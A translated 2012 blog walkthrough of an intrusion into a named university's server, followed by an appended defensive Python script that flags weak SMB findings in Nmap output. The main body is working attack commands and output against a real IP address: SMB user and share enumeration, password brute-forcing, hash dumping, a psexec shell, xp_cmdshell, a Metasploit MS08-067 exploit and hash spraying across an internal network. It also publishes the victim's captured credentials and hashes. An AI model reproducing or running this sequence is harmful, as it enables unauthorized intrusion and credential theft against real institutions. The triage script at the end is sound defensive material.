Intrusion of Guangxi Normal University with nmap + msf
Posted on 2012-12-4 12:46:42
Guangxi Normal University website: http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb   // list the SMB scan scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// use the script to enumerate the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser   // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// list the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.2418)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2   // grab the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse

root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds

C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe   // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user' "   // log in remotely as sa and run a command

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241   // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

root@bt:~# msfconsole   // use the MS08-067 vulnerability in msf to overflow the target machine

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit

meterpreter >
Background session 2? [y/N]  (ctrl+z)
msf  exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// try logging in across the whole internal range with the usernames and the captured hash

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful, a simple msf + nmap attack~~
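As an added defender-side example (not part of the original post), a Python triage pass over Nmap host-script output of the kind shown above: it flags anonymous share access from smb-enum-shares, successful smb-brute logins, empty or LM-bearing hashes from smb-pwdump, and VULNERABLE lines from smb-check-vulns. The sample report is constructed; 192.0.2.10 is a documentation address and both hashes are made up.

```python
import re
EMPTY_LM_HALF = "AAD3B435B51404EE"  # LM hash of the empty string (one 8-byte half)
# Constructed sample in the shape of the smb-* host-script output above; 192.0.2.10
# is a documentation address and both hashes are made up.
SAMPLE = """\
Nmap scan report for 192.0.2.10
| smb-enum-shares:
|   IPC$
|_    Anonymous access: READ
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful
| smb-pwdump:
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
|_test:1002 => 0123456789ABCDEFAAD3B435B51404EE:FEDCBA9876543210FEDCBA9876543210
| smb-check-vulns:
|_  MS08-067: VULNERABLE
"""

def triage(report):
    """Return (host, script, finding) triples for weak SMB settings in a report."""
    findings, host, script, share = [], None, None, None
    for raw in report.splitlines():
        if raw.startswith("Nmap scan report for "):
            host, script = raw.split()[-1], None    # new host, no script block yet
            continue
        if not raw.startswith("|"):
            continue                                # not NSE script output
        line = re.sub(r"^\|_?\s*", "", raw).strip() # drop Nmap's '| ' / '|_' prefix
        if re.fullmatch(r"smb[\w-]*:", line):
            script = line[:-1]                      # start of a script's result block
        elif script == "smb-enum-shares":
            m = re.match(r"Anonymous access: (\S+)", line)
            if m is None:
                share = line                        # a share-name line
            elif m.group(1) != "<none>":
                findings.append((host, script, f"share {share} allows anonymous {m.group(1)}"))
        elif script == "smb-brute":
            m = re.match(r"(\S+?):(\S+) => Login was successful", line)
            if m:
                kind = "blank" if m.group(2) == "<blank>" else "guessable"
                findings.append((host, script, f"{m.group(1)}: {kind} password"))
        elif script == "smb-pwdump":
            m = re.match(r"(\S+?):\d+ => ([^:]+):", line)
            if m and m.group(2).startswith("NO PASSWORD"):
                findings.append((host, script, f"{m.group(1)}: empty password"))
            elif m and re.fullmatch(r"[0-9A-F]{32}", m.group(2)):
                note = "LM hash stored"             # LM hashing should be disabled
                if m.group(2).endswith(EMPTY_LM_HALF):
                    note += ", password is 7 characters or fewer"
                findings.append((host, script, f"{m.group(1)}: {note}"))
        elif script == "smb-check-vulns" and line.endswith(": VULNERABLE"):
            findings.append((host, script, line.split(":")[0] + ": vulnerable"))
    return findings
```

Each finding maps to a remediation: remove anonymous access to IPC$, set passwords on the blank accounts, disable LM hash storage, and patch the MS08-067 host.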